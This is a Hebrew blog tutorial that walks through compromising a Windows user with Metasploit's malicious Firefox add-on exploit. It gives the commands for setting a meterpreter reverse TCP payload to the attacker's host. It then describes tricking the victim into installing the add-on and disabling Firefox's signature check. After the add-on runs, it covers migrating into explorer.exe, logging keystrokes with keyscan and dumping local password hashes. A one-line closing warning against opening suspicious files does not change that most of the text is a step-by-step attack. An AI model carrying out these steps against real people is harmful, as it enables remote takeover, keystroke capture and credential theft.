האקספלויט יוצר קובץ xpi addon. שמוצג לקורבן באמצעות אתר אינטרנט לגיטימי, דפדפן האינטרנט יקפיץ הודעה לקורבן שיש צורך בהתקנת תוסף ומבקש לאשר את ההתקנה.
במידה והקורבן יאשר את ההתקנה, המטען הזדוני יותקן וירוץ עם הרשאות משתמש מלאות.

* ראשית ניכנס אל Metasploit Framework בעזרת הפקודה הבאה:
> msfconsole
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\

* יש לטעון את ה-Payload הבא:
> use exploit/multi/browser/firefox_xpi_bootstrapped_addon


* פקודת Show Options, תציג את הדרישות של אותו ה-Payload.

* לאחר שסיימנו את השלב הראשון שבו הגדרנו את השרת ממנו ירד הקובץ הזדוני, נטען את ה-Payload הבא:
> set payload windows/meterpreter/reverse_tcp
באמצעות פקודת set נגדיר את כתובת ה-IP של ההוסט שלנו ואת מספר הפורט.

* כעת, נשתמש בפקודת show targets ובעזרת פקודת set נגדיר שה-Target יהיה 1 Native payload.
> set target 1





* אחרי שהכל מוכן כל שנותר הוא להריץ בעזרת פקודת run, המערכת תציג לנו לינק אותו נשלח אל הקורבן ונשכנע אותו להתקין את התוסף.
בשלב זה, המערכת ממתינה להורדה והתקנת התוסף.


* כפי שניתן לראות, לאחר הכניסה אל הלינק הזדוני, תוצג לקורבן הודעה שהתקנת תוסף נחוצה לצורך הפעלת הדף. נלחץ Allow.




* בחלק מהמקרים, מגרסה 44 ומעלה פיירפוקס מסנן תוספים לא חתומים ולכן נדרש להיכנס ל-about:config, לבצע חיפוש על ערך xpinstall.signatures.required ולבטל אותו באמצעות לחיצה כפולה.
מיד לאחר ההתקנה נקבל מטרפרטר.



* הפקודה help תציג רשימת פקודות שניתן לבצע, חלקן מופיעות בקישור הבא: http://www.omegaton.com/2017/04/meterpreter.html


* כל שנותר הוא לשדרג את התהליך (Process) שלנו לאחד יציב יותר כמו explorer וכו'
אם לא נשדרג לתהליך יציב יותר והקורבן יסגור את דפדפן האינטרנט (Firefox) החיבור אליו יפסק.

בעזרת פקודת ps נקבל את רשימת התהליכים שרצים ברקע, נבחר את התהליך הרצוי ונעתיק את ה-PID שלו.


נשתמש בפקודת migrate לצורך שדרוג
(כפי שניתן לראות בחרתי בexplorer.exe ומספר ה-PID שלו הוא 560).
> migrate 560


שימוש בפקודת Key_scan:
לאחר שהמחשב בשליטתי המלאה ניתן להשתמש בפקודה:
keyscan_start - התחל הקלטת מקלדת
keyscan_dump - הצג את "הקלטת" המקלדת על המסך
keyscan_stop - עצור הקלטת מקלדת

פקודת Hashdump:

תציג לנו את ה-Hash של כל המשתמשים המקומיים.

לסיום, שימו לב לפעולות שלכם ברשת האינטרנט, לא לפתוח קבצים חשודים, לא להתקין קבצים הנשלחים במייל או הורדו ממקור לא ידוע בנוסף.
Share To:

פאביו ליאור רחמים

Post A Comment: